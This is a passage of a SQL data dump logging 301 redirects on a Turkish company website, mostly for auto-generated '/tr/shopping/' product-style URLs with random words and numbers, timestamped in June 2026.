00:00:00',301),(75687,'https://3s-technologies.com.tr/tr/shopping/piperaceous/1337146813.html',NULL,'https://3s-technologies.com.tr/shopping/piperaceous/1337146813.html','',1,0,'2026-06-11 07:49:19','0000-00-00 00:00:00',301),(75688,'https://3s-technologies.com.tr/tr/shopping/yeomanlike/1262516098.html',NULL,'https://3s-technologies.com.tr/shopping/yeomanlike/1262516098.html','',1,0,'2026-06-11 07:49:22','0000-00-00 00:00:00',301),(75689,'https://3s-technologies.com.tr/tr/shopping/loture/1953905866.html',NULL,'https://3s-technologies.com.tr/shopping/loture/1953905866.html','',1,0,'2026-06-11 07:49:25','0000-00-00 00:00:00',301),(75690,'https://3s-technologies.com.tr/tr/shopping/tardiest/2994340025.html',NULL,'https://3s-technologies.com.tr/shopping/tardiest/2994340025.html','',1,0,'2026-06-11 07:49:28','0000-00-00 00:00:00',301),(75691,'https://3s-technologies.com.tr/tr/shopping/mishmash/3724093759.html',NULL,'https://3s-technologies.com.tr/shopping/mishmash/3724093759.html','',1,0,'2026-06-11 07:49:31','0000-00-00 00:00:00',301),(75692,'https://3s-technologies.com.tr/tr/shopping/nidificans/2477139253.html',NULL,'https://3s-technologies.com.tr/shopping/nidificans/2477139253.html','',1,0,'2026-06-11 07:49:34','0000-00-00 00:00:00',301),(75693,'https://3s-technologies.com.tr/tr/shopping/trematode/1617983839.html',NULL,'https://3s-technologies.com.tr/shopping/trematode/1617983839.html','',1,0,'2026-06-11 07:49:37','0000-00-00 00:00:00',301),(75694,'https://3s-technologies.com.tr/tr/shopping/tapetum/412023139.html',NULL,'https://3s-technologies.com.tr/shopping/tapetum/412023139.html','',1,0,'2026-06-11 07:49:40','0000-00-00 00:00:00',301),(75695,'https://3s-technologies.com.tr/tr/shopping/overharden/3964861217.html',NULL,'https://3s-technologies.com.tr/shopping/overharden/3964861217.html','',1,0,'2026-06-11 07:49:43','0000-00-00 00:00:00',301),(75696,'https://3s-technologies.com.tr/tr/shopping/gravid/3870972692.html',NULL,'https://3s-technologies.com.tr/shopping/gravid/3870972692.html','',1,0,'2026-06-11 07:49:46','0000-00-00 00:00:00',301),(75697,'https://3s-technologies.com.tr/tr/shopping/contrafissure/3428584427.html',NULL,'https://3s-technologies.com.tr/shopping/contrafissure/3428584427.html','',1,0,'2026-06-11 07:49:49','0000-00-00 00:00:00',301),(75698,'https://3s-technologies.com.tr/tr/shopping/poonah/151943910.html',NULL,'https://3s-technologies.com.tr/shopping/poonah/151943910.html','',1,0,'2026-06-11 07:49:52','0000-00-00 00:00:00',301),(75699,'https://3s-technologies.com.tr/tr/shopping/protracheata/1410616090.html',NULL,'https://3s-technologies.com.tr/shopping/protracheata/1410616090.html','',1,0,'2026-06-11 07:49:55','0000-00-00 00:00:00',301),(75700,'https://3s-technologies.com.tr/tr/shopping/placebo/645429215.html',NULL,'https://3s-technologies.com.tr/shopping/placebo/645429215.html','',1,0,'2026-06-11 07:49:58','0000-00-00 00:00:00',301),(75701,'https://3s-technologies.com.tr/tr/shopping/juncaceae/1564171659.html',NULL,'https://3s-technologies.com.tr/shopping/juncaceae/1564171659.html','',1,0,'2026-06-11 07:50:01','0000-00-00 00:00:00',301),(75702,'https://3s-technologies.com.tr/tr/shopping/alcyonacea/2094484023.html',NULL,'https://3s-technologies.com.tr/shopping/alcyonacea/2094484023.html','',1,0,'2026-06-11 07:50:04','0000-00-00 00:00:00',301),(75703,'https://3s-technologies.com.tr/tr/shopping/frothily/2753778257.html',NULL,'https://3s-technologies.com.tr/shopping/frothily/2753778257.html','',1,0,'2026-06-11 07:50:07','0000-00-00 00:00:00',301),(75704,'https://3s-technologies.com.tr/tr/shopping/montem/3049124066.html',NULL,'https://3s-technologies.com.tr/shopping/montem/3049124066.html','',1,0,'2026-06-11 07:50:10','0000-00-00 00:00:00',301),(75705,'https://3s-technologies.com.tr/tr/shopping/turkois/1799745363.html',NULL,'https://3s-technologies.com.tr/shopping/turkois/1799745363.html','',1,0,'2026-06-11 07:50:13','0000-00-00 00:00:00',301),(75706,'https://3s-technologies.com.tr/tr/shopping/frustrative/2406275977.html',NULL,'https://3s-technologies.com.tr/shopping/frustrative/2406275977.html','',1,0,'2026-06-11 07:50:16','0000-00-00 00:00:00',301),(75707,'https://3s-technologies.com.tr/tr/shopping/kefiric/1506192764.html',NULL,'https://3s-technologies.com.tr/shopping/kefiric/1506192764.html','',1,0,'2026-06-11 07:50:24','0000-00-00 00:00:00',301),(75708,'https://3s-technologies.com.tr/tr/shopping/infantum/3712328462.html',NULL,'https://3s-technologies.com.tr/shopping/infantum/3712328462.html','',1,0,'2026-06-11 07:50:25','0000-00-00 00:00:00',301),(75709,'https://3s-technologies.com.tr/tr/shopping/foetidum/242977188.html',NULL,'https://3s-technologies.com.tr/shopping/foetidum/242977188.html','',1,0,'2026-06-11 07:50:28','0000-00-00 00:00:00',301),(75710,'https://3s-technologies.com.tr/tr/shopping/glyceride/2475927170.html',NULL,'https://3s-technologies.com.tr/shopping/glyceride/2475927170.html','',1,0,'2026-06-11 07:50:31','0000-00-00 00:00:00',301),(75711,'https://3s-technologies.com.tr/tr/shopping/myselven/3389336208.html',NULL,'https://3s-technologies.com.tr/shopping/myselven/3389336208.html','',1,0,'2026-06-11 07:50:34','0000-00-00 00:00:00',301),(75712,'https://3s-technologies.com.tr/tr/shopping/duddery/1377168758.html',NULL,'https://3s-technologies.com.tr/shopping/duddery/1377168758.html','',1,0,'2026-06-11 07:50:37','0000-00-00 00:00:00',301),(75713,'https://3s-technologies.com.tr/tr/shopping/unnestle/1599390616.html',NULL,'https://3s-technologies.com.tr/shopping/unnestle/1599390616.html','',1,0,'2026-06-11 07:50:40','0000-00-00 00:00:00',301),(75714,'https://3s-technologies.com.tr/tr/shopping/wonderment/1829652483.html',NULL,'https://3s-technologies.com.tr/shopping/wonderment/1829652483.html','',1,0,'2026-06-11 07:50:43','0000-00-00 00:00:00',301),(75715,'https://3s-technologies.com.tr/tr/shopping/orichalceous/3353903035.html',NULL,'https://3s-technologies.com.tr/shopping/orichalceous/3353903035.html','',1,0,'2026-06-11 07:50:46','0000-00-00 00:00:00',301),(75716,'https://3s-technologies.com.tr/tr/shopping/mousie/547642559.html',NULL,'https://3s-technologies.com.tr/shopping/mousie/547642559.html','',1,0,'2026-06-11 07:50:51','0000-00-00 00:00:00',301),(75717,'https://3s-technologies.com.tr/tr/shopping/alimentariness/2971020577.html',NULL,'https://3s-technologies.com.tr/shopping/alimentariness/2971020577.html','',1,0,'2026-06-11 07:50:54','0000-00-00 00:00:00',301),(75718,'https://3s-technologies.com.tr/tr/shopping/unsuited/3737812500.html',NULL,'https://3s-technologies.com.tr/shopping/unsuited/3737812500.html','',1,0,'2026-06-11 07:50:57','0000-00-00 00:00:00',301),(75719,'https://3s-technologies.com.tr/tr/shopping/silicioidea/2050253212.html',NULL,'https://3s-technologies.com.tr/shopping/silicioidea/2050253212.html','',1,0,'2026-06-11 07:51:00','0000-00-00 00:00:00',301),(75720,'https://3s-technologies.com.tr/tr/shopping/bonapartism/689432815.html',NULL,'https://3s-technologies.com.tr/shopping/bonapartism/689432815.html','',1,0,'2026-06-11 07:51:03','0000-00-00 00:00:00',301),(75721,'https://3s-technologies.com.tr/tr/shopping/homericae/3611558066.html',NULL,'https://3s-technologies.com.tr/shopping/homericae/3611558066.html','',1,0,'2026-06-11 07:51:06','0000-00-00 00:00:00',301),(75722,'https://3s-technologies.com.tr/tr/shopping/archeology/1008443414.html',NULL,'https://3s-technologies.com.tr/shopping/archeology/1008443414.html','',1,0,'2026-06-11 07:51:09','0000-00-00 00:00:00',301),(75723,'https://3s-technologies.com.tr/tr/shopping/cognoscenti/1800957462.html',NULL,'https://3s-technologies.com.tr/shopping/cognoscenti/1800957462.html','',1,0,'2026-06-11 07:51:11','0000-00-00 00:00:00',301),(75724,'https://3s-technologies.com.tr/tr/shopping/cupriferous/2049041097.html',NULL,'https://3s-technologies.com.tr/shopping/cupriferous/2049041097.html','',1,0,'2026-06-11 07:51:15','0000-00-00 00:00:00',301),(75725,'https://3s-technologies.com.tr/tr/shopping/portmantle/3469604287.html',NULL,'https://3s-technologies.com.tr/shopping/portmantle/3469604287.html','',1,0,'2026-06-11 07:51:18','0000-00-00 00:00:00',301),(75726,'https://3s-technologies.com.tr/tr/shopping/emprosthotonos/746199611.html',NULL,'https://3s-technologies.com.tr/shopping/emprosthotonos/746199611.html','',1,0,'2026-06-11 07:51:20','0000-00-00 00:00:00',301),(75727,'https://3s-technologies.com.tr/tr/shopping/unmiter/1600602731.html',NULL,'https://3s-technologies.com.tr/shopping/unmiter/1600602731.html','',1,0,'2026-06-11 07:51:24','0000-00-00 00:00:00',301),(75728,'https://3s-technologies.com.tr/tr/shopping/phenakistoscope/3591433472.html',NULL,'https://3s-technologies.com.tr/shopping/phenakistoscope/3591433472.html','',1,0,'2026-06-11 07:51:27','0000-00-00 00:00:00',301),(75729,'https://3s-technologies.com.tr/tr/shopping/antenuptial/228998823.html',NULL,'https://3s-technologies.com.tr/shopping/antenuptial/228998823.html','',1,0,'2026-06-11 07:51:30','0000-00-00 00:00:00',301),(75730,'https://3s-technologies.com.tr/tr/shopping/crosseyed/1032108236.html',NULL,'https://3s-technologies.com.tr/shopping/crosseyed/1032108236.html','',1,0,'2026-06-11 07:51:32','0000-00-00 00:00:00',301),(75731,'https://3s-technologies.com.tr/tr/shopping/songster/1029943646.html',NULL,'https://3s-technologies.com.tr/shopping/songster/1029943646.html','',1,0,'2026-06-11 07:51:36','0000-00-00 00:00:00',301),(75732,'https://3s-technologies.com.tr/tr/shopping/alvei/2047665475.html',NULL,'https://3s-technologies.com.tr/shopping/alvei/2047665475.html','',1,0,'2026-06-11 07:51:39','0000-00-00 00:00:00',301),(75733,'https://3s-technologies.com.tr/tr/shopping/photogenic/3898359502.html',NULL,'https://3s-technologies.com.tr/shopping/photogenic/3898359502.html','',1,0,'2026-06-11 07:51:42','0000-00-00 00:00:00',301),(75734,'https://3s-technologies.com.tr/tr/shopping/drynurse/1829816006.html',NULL,'https://3s-technologies.com.tr/shopping/drynurse/1829816006.html','',1,0,'2026-06-11 07:51:45','0000-00-00 00:00:00',301),(75735,'https://3s-technologies.com.tr/tr/shopping/warrin/1183427721.html',NULL,'https://3s-technologies.com.tr/shopping/warrin/1183427721.html','',1,0,'2026-06-11 07:51:48','0000-00-00 00:00:00',301),(75736,'https://3s-technologies.com.tr/tr/shopping/almery/426116549.html',NULL,'https://3s-technologies.com.tr/shopping/almery/426116549.html','',1,0,'2026-06-11 07:51:51','0000-00-00 00:00:00',301),(75737,'https://3s-technologies.com.tr/tr/shopping/wholly/1213271153.html',NULL,'https://3s-technologies.com.tr/shopping/wholly/1213271153.html','',1,0,'2026-06-11 07:51:54','0000-00-00 00:00:00',301),(75738,'https://3s-technologies.com.tr/tr/shopping/mangoldwurzel/2403851779.html',NULL,'https://3s-technologies.com.tr/shopping/mangoldwurzel/2403851779.html','',1,0,'2026-06-11 07:51:57','0000-00-00 00:00:00',301),(75739,'https://3s-technologies.com.tr/tr/shopping/dichroiscope/546266921.html',NULL,'https://3s-technologies.com.tr/shopping/dichroiscope/546266921.html','',1,0,'2026-06-11 07:52:00','0000-00-00 00:00:00',301),(75740,'https://3s-technologies.com.tr/tr/shopping/spurway/2746419913.html',NULL,'https://3s-technologies.com.tr/shopping/spurway/2746419913.html','',1,0,'2026-06-11 07:52:02','0000-00-00 00:00:00',301),(75741,'https://3s-technologies.com.tr/tr/shopping/persuasion/1764526390.html',NULL,'https://3s-technologies.com.tr/shopping/persuasion/1764526390.html','',1,0,'2026-06-11 07:52:06','0000-00-00 00:00:00',301),(75742,'https://3s-technologies.com.tr/tr/shopping/independents/104563621.html',NULL,'https://3s-technologies.com.tr/shopping/independents/104563621.html','',1,0,'2026-06-11 07:52:09','0000-00-00 00:00:00',301),(75743,'https://3s-technologies.com.tr/tr/shopping/sitology/2221041679.html',NULL,'https://3s-technologies.com.tr/shopping/sitology/2221041679.html','',1,0,'2026-06-11 07:52:12','0000-00-00 00:00:00',301),(75744,'https://3s-technologies.com.tr/tr/shopping/recriminative/1375956659.html',NULL,'https://3s-technologies.com.tr/shopping/recriminative/1375956659.html','',1,0,'2026-06-11 07:52:15','0000-00-00 00:00:00',301),(75745,'https://3s-technologies.com.tr/tr/shopping/sempstress/505221023.html',NULL,'https://3s-technologies.com.tr/shopping/sempstress/505221023.html','',1,0,'2026-06-11 07:52:18','0000-00-00 00:00:00',301),(75746,'https://3s-technologies.com.tr/tr/shopping/abovedeck/1915662664.html',NULL,'https://3s-technologies.com.tr/shopping/abovedeck/1915662664.html','',1,0,'2026-06-11 07:52:23','0000-00-00 00:00:00',301),(75747,'https://3s-technologies.com.tr/tr/shopping/rivulet/4118295058.html',NULL,'https://3s-technologies.com.tr/shopping/rivulet/4118295058.html','',1,0,'2026-06-11 07:52:25','0000-00-00 00:00:00',301),(75748,'https://3s-technologies.com.tr/tr/shopping/hoarsest/1220162427.html',NULL,'https://3s-technologies.com.tr/shopping/hoarsest/1220162427.html','',1,0,'2026-06-11 07:52:28','0000-00-00 00:00:00',301),(75749,'https://3s-technologies.com.tr/tr/shopping/enticement/2863211568.html',NULL,'https://3s-technologies.com.tr/shopping/enticement/2863211568.html','',1,0,'2026-06-11 07:52:34','0000-00-00 00:00:00',301),(75750,'https://3s-technologies.com.tr/tr/shopping/fretum/2938890859.html',NULL,'https://3s-technologies.com.tr/shopping/fretum/2938890859.html','',1,0,'2026-06-11 07:52:37','0000-00-00 00:00:00',301),(75751,'https://3s-technologies.com.tr/tr/shopping/nacre/942551584.html',NULL,'https://3s-technologies.com.tr/shopping/nacre/942551584.html','',1,0,'2026-06-11 07:52:40','0000-00-00 00:00:00',301),(75752,'https://3s-technologies.com.tr/tr/shopping/dominie/1171873570.html',NULL,'https://3s-technologies.com.tr/shopping/dominie/1171873570.html','',1,0,'2026-06-11 07:52:46','0000-00-00 00:00:00',301),(75753,'https://3s-technologies.com.tr/tr/shopping/clysmian/1873260080.html',NULL,'https://3s-technologies.com.tr/shopping/clysmian/1873260080.html','',1,0,'2026-06-11 07:52:48','0000-00-00 00:00:00',301),(75754,'https://3s-technologies.com.tr/tr/shopping/distort/50221039.html',NULL,'https://3s-technologies.com.tr/shopping/distort/50221039.html','',1,0,'2026-06-11 07:52:51','0000-00-00 00:00:00',301),(75755,'https://3s-technologies.com.tr/tr/shopping/croitre/3138294871.html',NULL,'https://3s-technologies.com.tr/shopping/croitre/3138294871.html','',1,0,'2026-06-11 07:52:54','0000-00-00 00:00:00',301),(75756,'https://3s-technologies.com.tr/tr/shopping/emblazed/1796246978.html',NULL,'https://3s-technologies.com.tr/shopping/emblazed/1796246978.html','',1,0,'2026-06-11 07:52:57','0000-00-00 00:00:00',301),(75757,'https://3s-technologies.com.tr/tr/shopping/oblige/955191203.html',NULL,'https://3s-technologies.com.tr/shopping/oblige/955191203.html','',1,0,'2026-06-11 07:53:00','0000-00-00 00:00:00',301),(75758,'https://3s-technologies.com.tr/tr/shopping/rhapsodies/1287738329.html',NULL,'https://3s-technologies.com.tr/shopping/rhapsodies/1287738329.html','',1,0,'2026-06-11 07:53:15','0000-00-00 00:00:00',301),(75759,'https://3s-technologies.com.tr/tr/shopping/tridactylous/1579266022.html',NULL,'https://3s-technologies.com.tr/shopping/tridactylous/1579266022.html','',1,0,'2026-06-11 07:53:17','0000-00-00 00:00:00',301),(75760,'https://3s-technologies.com.tr/tr/shopping/banderilla/3422783524.html',NULL,'https://3s-technologies.com.tr/shopping/banderilla/3422783524.html','',1,0,'2026-06-11 07:53:21','0000-00-00 00:00:00',301),(75761,'https://3s-technologies.com.tr/tr/shopping/orthognathic/169462487.html',NULL,'https://3s-technologies.com.tr/shopping/orthognathic/169462487.html','',1,0,'2026-06-11 07:53:24','0000-00-00 00:00:00',301),(75762,'https://3s-technologies.com.tr/tr/shopping/enviableness/750788399.html',NULL,'https://3s-technologies.com.tr/shopping/enviableness/750788399.html','',1,0,'2026-06-11 07:54:09','0000-00-00 00:00:00',301),(75763,'https://3s-technologies.com.tr/tr/shopping/leporid/2592840505.html',NULL,'https://3s-technologies.com.tr/shopping/leporid/2592840505.html','',1,0,'2026-06-11 07:54:11','0000-00-00 00:00:00',301),(75764,'https://3s-technologies.com.tr/tr/shopping/branchiostegous/2580074255.html',NULL,'https://3s-technologies.com.tr/shopping/branchiostegous/2580074255.html','',1,0,'2026-06-11 07:54:26','0000-00-00 00:00:00',301),(75765,'https://3s-technologies.com.tr/tr/shopping/xylic/759311203.html',NULL,'https://3s-technologies.com.tr/shopping/xylic/759311203.html','',1,0,'2026-06-11 07:54:28','0000-00-00 00:00:00',301),(75766,'https://3s-technologies.com.tr/tr/shopping/bordelais/2368796329.html',NULL,'https://3s-technologies.com.tr/shopping/bordelais/2368796329.html','',1,0,'2026-06-11 07:54:46','0000-00-00 00:00:00',301),(75767,'https://3s-technologies.com.tr/tr/shopping/dasypodidae/1100783067.html',NULL,'https://3s-technologies.com.tr/shopping/dasypodidae/1100783067.html','',1,0,'2026-06-11 07:54:50','0000-00-00 00:00:00',301),(75768,'https://3s-technologies.com.tr/tr/shopping/mungoose/1118301644.html',NULL,'https://3s-technologies.com.tr/shopping/mungoose/1118301644.html','',1,0,'2026-06-11 07:55:09','0000-00-00 00:00:00',301),(75769,'https://3s-technologies.com.tr/tr/shopping/phylactolaemata/2904909612.html',NULL,'https://3s-technologies.com.tr/shopping/phylactolaemata/2904909612.html','',1,0,'2026-06-11 07:55:11','0000-00-00 00:00:00',301),(75770,'https://3s-technologies.com.tr/tr/shopping/telluium/3344561936.html',NULL,'https://3s-technologies.com.tr/shopping/telluium/3344561936.html','',1,0,'2026-06-11 07:55:30','0000-00-00 00:00:00',301),(75771,'https://3s-technologies.com.tr/tr/shopping/neurospast/662177120.html',NULL,'https://3s-technologies.com.tr/shopping/neurospast/662177120.html','',1,0,'2026-06-11 07:55:32','0000-00-00 00:00:00',301),(75772,'https://3s-technologies.com.tr/tr/shopping/pesage/3384795011.html',NULL,'https://3s-technologies.com.tr/shopping/pesage/3384795011.html','',1,0,'2026-06-11 07:55:39','0000-00-00 00:00:00',301),(75773,'https://3s-technologies.com.tr/tr/shopping/mississippian/4157012432.html',NULL,'https://3s-technologies.com.tr/shopping/mississippian/4157012432.html','',1,0,'2026-06-11 07:55:42','0000-00-00 00:00:00',301),(75774,'https://3s-technologies.com.tr/tr/shopping/chairlift/3170789728.html',NULL,'https://3s-technologies.com.tr/shopping/chairlift/3170789728.html','',1,0,'2026-06-11 07:56:24','0000-00-00 00:00:00',301),(75775,'https://3s-technologies.com.tr/tr/shopping/collectorate/2866709969.html',NULL,'https://3s-technologies.com.tr/shopping/collectorate/2866709969.html','',1,0,'2026-06-11 07:56:29','0000-00-00 00:00:00',301),(75776,'https://3s-technologies.com.tr/tr/shopping/airwoman/280786097.html',NULL,'https://3s-technologies.com.tr/shopping/airwoman/280786097.html','',1,0,'2026-06-11 07:56:35','0000-00-00 00:00:00',301),(75777,'https://3s-technologies.com.tr/tr/shopping/leitmotivlimactmotef/2876051068.html',NULL,'https://3s-technologies.com.tr/shopping/leitmotivlimactmotef/2876051068.html','',1,0,'2026-06-11 07:56:38','0000-00-00 00:00:00',301),(75778,'https://3s-technologies.com.tr/tr/shopping/criminology/931337840.html',NULL,'https://3s-technologies.com.tr/shopping/criminology/931337840.html','',1,0,'2026-06-11 07:57:30','0000-00-00 00:00:00',301),(75779,'https://3s-technologies.com.tr/tr/shopping/superinvestiture/3252576151.html',NULL,'https://3s-technologies.com.tr/shopping/superinvestiture/3252576151.html','',1,0,'2026-06-11 07:57:37','0000-00-00 00:00:00',301),(75780,'https://3s-technologies.com.tr/tr/shopping/freedwoman/1345326474.html',NULL,'https://3s-technologies.com.tr/shopping/freedwoman/1345326474.html','',1,0,'2026-06-11 07:57:41','0000-00-00 00:00:00',301),(75781,'https://3s-technologies.com.tr/tr/shopping/untrustful/1691402439.html',NULL,'https://3s-technologies.com.tr/shopping/untrustful/1691402439.html','',1,0,'2026-06-11 07:58:07','0000-00-00 00:00:00',301),(75782,'https://3s-technologies.com.tr/tr/shopping/spiritualism/2143632883.html',NULL,'https://3s-technologies.com.tr/shopping/spiritualism/2143632883.html','',1,0,'2026-06-11 07:58:11','0000-00-00 00:00:00',301),(75783,'https://3s-technologies.com.tr/tr/shopping/womanish/3232451557.html',NULL,'https://3s-technologies.com.tr/shopping/womanish/3232451557.html','',1,0,'2026-06-11 07:58:19','0000-00-00 00:00:00',301),(75784,'https://3s-technologies.com.tr/tr/shopping/housewife/1050675389.html',NULL,'https://3s-technologies.com.tr/shopping/housewife/1050675389.html','',1,0,'2026-06-11 07:58:21','0000-00-00 00:00:00',301),(75785,'https://3s-technologies.com.tr/tr/shopping/tubulibranchiata/1213107630.html',NULL,'https://3s-technologies.com.tr/shopping/tubulibranchiata/1213107630.html','',1,0,'2026-06-11 07:58:26','0000-00-00 00:00:00',301),(75786,'https://3s-technologies.com.tr/tr/shopping/disquisitorial/2116591404.html',NULL,'https://3s-technologies.com.tr/shopping/disquisitorial/2116591404.html','',1,0,'2026-06-11 07:58:29','0000-00-00 00:00:00',301),(75787,'https://3s-technologies.com.tr/tr/shopping/rhabdomere/3698004739.html',NULL,'https://3s-technologies.com.tr/shopping/rhabdomere/3698004739.html','',1,0,'2026-06-11 07:58:52','0000-00-00 00:00:00',301),(75788,'https://3s-technologies.com.tr/tr/shopping/unparliamentariness/2407488092.html',NULL,'https://3s-technologies.com.tr/shopping/unparliamentariness/2407488092.html','',1,0,'2026-06-11 07:58:54','0000-00-00 00:00:00',301),(75789,'https://3s-technologies.com.tr/tr/shopping/thermomultiplier/984337197.html',NULL,'https://3s-technologies.com.tr/shopping/thermomultiplier/984337197.html','',1,0,'2026-06-11 07:59:17','0000-00-00 00:00:00',301),(75790,'https://3s-technologies.com.tr/tr/shopping/wedelia/924420939.html',NULL,'https://3s-technologies.com.tr/shopping/wedelia/924420939.html','',1,0,'2026-06-11 07:59:20','0000-00-00 00:00:00',301),(75791,'https://3s-technologies.com.tr/tr/shopping/babyblueeyes/1655790517.html',NULL,'https://3s-technologies.com.tr/shopping/babyblueeyes/1655790517.html','',1,0,'2026-06-11 07:59:28','0000-00-00 00:00:00',301),(75792,'https://3s-technologies.com.tr/tr/shopping/sexagenary/2121180192.html',NULL,'https://3s-technologies.com.tr/shopping/sexagenary/2121180192.html','',1,0,'2026-06-11 07:59:32','0000-00-00 00:00:00',301),(75793,'https://3s-technologies.com.tr/tr/shopping/hairdresser/2314453731.html',NULL,'https://3s-technologies.com.tr/shopping/hairdresser/2314453731.html','',1,0,'2026-06-11 08:00:14','0000-00-00 00:00:00',301),(75794,'https://3s-technologies.com.tr/tr/shopping/sleetch/3000352375.html',NULL,'https://3s-technologies.com.tr/shopping/sleetch/3000352375.html','',1,0,'2026-06-11 08:00:57','0000-00-00 00:00:00',301),(75795,'https://3s-technologies.com.tr/tr/shopping/completion/1863736624.html',NULL,'https://3s-technologies.com.tr/shopping/completion/1863736624.html','',1,0,'2026-06-11 08:01:01','0000-00-00 00:00:00',301),(75796,'http://3s-technologies.com.tr/tr/bitrix/themes/.default/public/components/buttons2/edits.php',NULL,'','',1,0,'2026-06-11 08:01:02','0000-00-00 00:00:00',301),(75797,'https://3s-technologies.com.tr/tr/shopping/sarcodes/451908151.html',NULL,'https://3s-technologies.com.tr/shopping/sarcodes/451908151.html','',1,0,'2026-06-11 08:01:04','0000-00-00 00:00:00',301),(75798,'https://3s-technologies.com.tr/tr/shopping/confutable/991561646.html',NULL,'https://3s-technologies.com.tr/shopping/confutable/991561646.html','',1,0,'2026-06-11 08:01:07','0000-00-00 00:00:00',301),(75799,'https://3s-technologies.com.tr/tr/shopping/snaffle/3563438932.html',NULL,'https://3s-technologies.com.tr/shopping/snaffle/3563438932.html','',1,0,'2026-06-11 08:01:11','0000-00-00 00:00:00',301),(75800,'https://3s-technologies.com.tr/tr/shopping/sensor/845019063.html',NULL,'https://3s-technologies.com.tr/shopping/sensor/845019063.html','',1,0,'2026-06-11 08:01:13','0000-00-00 00:00:00',301),(75801,'https://3s-technologies.com.tr/tr/shopping/perithecium/3030423018.html',NULL,'https://3s-technologies.com.tr/shopping/perithecium/3030423018.html','',1,0,'2026-06-11 08:01:16','0000-00-00 00:00:00',301),(75802,'https://3s-technologies.com.tr/tr/shopping/encroachingly/2039959084.html',NULL,'https://3s-technologies.com.tr/shopping/encroachingly/2039959084.html','',1,0,'2026-06-11 08:01:19','0000-00-00 00:00:00',301),(75803,'https://3s-technologies.com.tr/tr/shopping/punctilious/1517824166.html',NULL,'https://3s-technologies.com.tr/shopping/punctilious/1517824166.html','',1,0,'2026-06-11 08:01:23','0000-00-00 00:00:00',301),(75804,'https://3s-technologies.com.tr/tr/shopping/linked/1540113350.html',NULL,'https://3s-technologies.com.tr/shopping/linked/1540113350.html','',1,0,'2026-06-11 08:01:30','0000-00-00 00:00:00',301),(75805,'https://3s-technologies.com.tr/tr/shopping/afield/2513058723.html',NULL,'https://3s-technologies.com.tr/shopping/afield/2513058723.html','',1,0,'2026-06-11 08:01:35','0000-00-00 00:00:00',301),(75806,'https://3s-technologies.com.tr/tr/shopping/generalizing/4067316966.html',NULL,'https://3s-technologies.com.tr/shopping/generalizing/4067316966.html','',1,0,'2026-06-11 08:01:38','0000-00-00 00:00:00',301),(75807,'https://3s-technologies.com.tr/tr/shopping/effect/592346656.html',NULL,'https://3s-technologies.com.tr/shopping/effect/592346656.html','',1,0,'2026-06-11 08:01:41','0000-00-00 00:00:00',301),(75808,'https://3s-technologies.com.tr/tr/shopping/motivated/3781753683.html',NULL,'https://3s-technologies.com.tr/shopping/motivated/3781753683.html','',1,0,'2026-06-11 08:01:44','0000-00-00 00:00:00',301),(75809,'https://3s-technologies.com.tr/tr/shopping/thecodont/3908008133.html',NULL,'https://3s-technologies.com.tr/shopping/thecodont/3908008133.html','',1,0,'2026-06-11 08:01:47','0000-00-00 00:00:00',301),(75810,'https://3s-technologies.com.tr/tr/shopping/murmuringly/127323876.html',NULL,'https://3s-technologies.com.tr/shopping/murmuringly/127323876.html','',1,0,'2026-06-11 08:01:50','0000-00-00 00:00:00',301),(75811,'https://3s-technologies.com.tr/tr/shopping/offended/1743283045.html',NULL,'https://3s-technologies.com.tr/shopping/offended/1743283045.html','',1,0,'2026-06-11 08:01:53','0000-00-00 00:00:00',301),(75812,'https://3s-technologies.com.tr/tr/shopping/draping/66786587.html',NULL,'https://3s-technologies.com.tr/shopping/draping/66786587.html','',1,0,'2026-06-11 08:01:56','0000-00-00 00:00:00',301),(75813,'https://3s-technologies.com.tr/tr/shopping/getulus/1551271498.html',NULL,'https://3s-technologies.com.tr/shopping/getulus/1551271498.html','',1,0,'2026-06-11 08:02:06','0000-00-00 00:00:00',301),(75814,'https://3s-technologies.com.tr/tr/shopping/perplexedly/1785892727.html',NULL,'https://3s-technologies.com.tr/shopping/perplexedly/1785892727.html','',1,0,'2026-06-11 08:02:08','0000-00-00 00:00:00',301),(75815,'https://3s-technologies.com.tr/tr/shopping/abatable/254790425.html',NULL,'https://3s-technologies.com.tr/shopping/abatable/254790425.html','',1,0,'2026-06-11 08:02:11','0000-00-00 00:00:00',301),(75816,'https://3s-technologies.com.tr/tr/shopping/selfelective/635135087.html',NULL,'https://3s-technologies.com.tr/shopping/selfelective/635135087.html','',1,0,'2026-06-11 08:02:14','0000-00-00 00:00:00',301),(75817,'https://3s-technologies.com.tr/tr/shopping/evolutionism/2606029364.html',NULL,'https://3s-technologies.com.tr/shopping/evolutionism/2606029364.html','',1,0,'2026-06-11 08:02:17','0000-00-00 00:00:00',301),(75818,'https://3s-technologies.com.tr/tr/shopping/middler/1744495144.html',NULL,'https://3s-technologies.com.tr/shopping/middler/1744495144.html','',1,0,'2026-06-11 08:02:20','0000-00-00 00:00:00',301),(75819,'https://3s-technologies.com.tr/tr/shopping/interconnected/2244850510.html',NULL,'https://3s-technologies.com.tr/shopping/interconnected/2244850510.html','',1,0,'2026-06-11 08:02:23','0000-00-00 00:00:00',301),(75820,'https://3s-technologies.com.tr/tr/shopping/tonometer/3748673262.html',NULL,'https://3s-technologies.com.tr/shopping/tonometer/3748673262.html','',1,0,'2026-06-11 08:02:26','0000-00-00 00:00:00',301),(75821,'https://3s-technologies.com.tr/tr/shopping/rixatrix/4086229461.html',NULL,'https://3s-technologies.com.tr/shopping/rixatrix/4086229461.html','',1,0,'2026-06-11 08:02:29','0000-00-00 00:00:00',301),(75822,'https://3s-technologies.com.tr/tr/shopping/adequately/376456087.html',NULL,'https://3s-technologies.com.tr/shopping/adequately/376456087.html','',1,0,'2026-06-11 08:02:32','0000-00-00 00:00:00',301),(75823,'https://3s-technologies.com.tr/tr/shopping/dijudication/3979098652.html',NULL,'https://3s-technologies.com.tr/shopping/dijudication/3979098652.html','',1,0,'2026-06-11 08:02:35','0000-00-00 00:00:00',301),(75824,'https://3s-technologies.com.tr/tr/shopping/metamorphosed/39485484.html',NULL,'https://3s-technologies.com.tr/shopping/metamorphosed/39485484.html','',1,0,'2026-06-11 08:02:38','0000-00-00 00:00:00',301),(75825,'https://3s-technologies.com.tr/tr/shopping/disgracious/986972842.html',NULL,'https://3s-technologies.com.tr/shopping/disgracious/986972842.html','',1,0,'2026-06-11 08:02:45','0000-00-00 00:00:00',301),(75826,'https://3s-technologies.com.tr/tr/shopping/mintman/3724912355.html',NULL,'https://3s-technologies.com.tr/shopping/mintman/3724912355.html','',1,0,'2026-06-11 08:02:47','0000-00-00 